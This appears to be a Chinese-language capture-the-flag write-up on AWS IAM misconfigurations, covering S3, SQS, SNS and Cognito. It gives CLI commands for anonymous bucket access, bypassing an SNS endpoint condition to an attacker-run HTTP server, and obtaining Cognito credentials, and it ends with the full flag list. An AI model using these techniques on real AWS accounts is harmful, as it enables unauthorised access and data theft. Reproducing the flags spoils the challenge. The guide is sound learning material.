IAM安全技术学习指南

1. AWS S3存储桶安全

1.1 S3存储桶基础概念

• 存储桶(Bucket): 云上的文件存储位置，如my-awesome-bucket
• 对象(Object): 存储桶中的文件，如照片、文档等
• 键(Key): 文件的路径标识
• 访问URL格式: https://<bucket-name>.s3.<region>.amazonaws.com/<key>

1.2 S3存储桶策略分析

示例策略解析：

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
    },
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": "s3:ListBucket",
      "Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
      "Condition": {
        "StringLike": {
          "s3:prefix": "files/*"
        }
      }
    }
  ]
}

关键元素：

• Effect: 允许(Allow)或拒绝(Deny)操作
• Principal: 指定可执行操作的主体，*表示所有用户
• Action: 允许的操作类型，如s3:GetObject(下载文件)、s3:ListBucket(列出文件)
• Resource: 操作的目标资源
• Condition: 额外限制条件，如限制只能列出files/目录下的文件

1.3 S3存储桶安全实践

公共存储桶风险案例:

1. 列出存储桶内容:

aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/

2. 下载文件(当无写权限时写入临时目录):

aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt /tmp

3. 直接通过URL访问:

https://thebigiamchallenge-storage-9979f4b.s3.amazonaws.com/files/flag1.txt

管理员限制存储桶绕过:
当策略限制只有特定管理员可访问时，使用--no-sign-request参数绕过认证:

aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt /tmp

2. AWS SQS(简单队列服务)安全

2.1 SQS基础

• 用于分布式应用程序中解耦和协调不同组件
• 允许系统间通过发送和接收消息进行异步通信

2.2 SQS策略分析

示例策略:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sqs:SendMessage",
        "sqs:ReceiveMessage"
      ],
      "Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
    }
  ]
}

2.3 SQS消息接收实践

1. 构造队列URL:

https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

2. 接收消息:

aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2

3. 从返回消息中获取关键信息(如包含flag的URL)

3. AWS SNS(简单通知服务)安全

3.1 SNS订阅策略分析

示例策略:

{
  "Version": "2008-10-17",
  "Id": "Statement1",
  "Statement": [
    {
      "Sid": "Statement1",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "SNS:Subscribe",
      "Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
      "Condition": {
        "StringLike": {
          "sns:Endpoint": "*@tbic.wiz.io"
        }
      }
    }
  ]
}

3.2 SNS订阅绕过技术

1. 常规订阅尝试:

aws sns subscribe \
  --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
  --protocol email \
  --notification-endpoint lll@tbic.wiz.io

2. HTTP协议端点绕过:

aws sns subscribe \
  --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications \
  --protocol http \
  --notification-endpoint http://your-server:port/@tbic.wiz.io

3. 从返回的SubscribeURL确认订阅获取flag

4. AWS Cognito安全

4.1 Cognito基础组件

• 身份池(Identity Pools): 管理用户身份，提供AWS资源访问权限
• 用户池(User Pools): 用户目录，管理注册、登录和身份验证

4.2 Cognito身份获取流程

1. 获取身份ID:

aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b" --region us-east-1

2. 获取临时凭据:

aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:9bece720-ce90-40dc-9217-06b6c0dc3d0f" --region us-east-1

3. 设置环境变量使用获取的凭据访问受限资源

4.3 带身份验证的Cognito角色使用

1. 获取身份ID:

aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"

2. 获取OpenID令牌:

aws cognito-identity get-open-id-token --identity-id "us-east-1:157d6171-ee5f-c819-ce3c-93e452471370"

3. 使用Web身份获取角色凭据:

aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role \
  --role-session-name test \
  --web-identity-token "eyJraWQiOi..."

4. 使用返回的凭据访问受限资源

5. 关键安全总结

1. 公共存储桶风险:

   • 避免设置Principal: "*"与Action: "s3:GetObject"
   • 谨慎使用s3:ListBucket权限

2. SQS消息队列风险:

   • 限制Principal范围，避免公开ReceiveMessage权限

3. SNS订阅风险:

   • 严格验证端点格式条件
   • 注意协议处理可能存在的绕过

4. Cognito身份池风险:

   • 合理设置身份池的认证要求
   • 限制未认证用户的权限
   • 谨慎分配IAM角色权限

5. IAM策略最佳实践:

   • 遵循最小权限原则
   • 使用Conditions限制访问
   • 定期审计策略配置

6. 实战Flag汇总

1. Buckets of Fun:
   {wiz:exposed-storage-risky-as-usual}

2. Google Analytics:
   {wiz:you-are-at-the-front-of-the-queue}

3. Enable Push Notifications:
   {wiz:always-suspect-asterisks}

4. Admin only?:
   {wiz:principal-arn-is-not-what-you-think}

5. Do I know you?:
   {wiz:incognito-is-always-suspicious}

6. One final push:
   {wiz:open-sesame-or-shell-i-say-openid}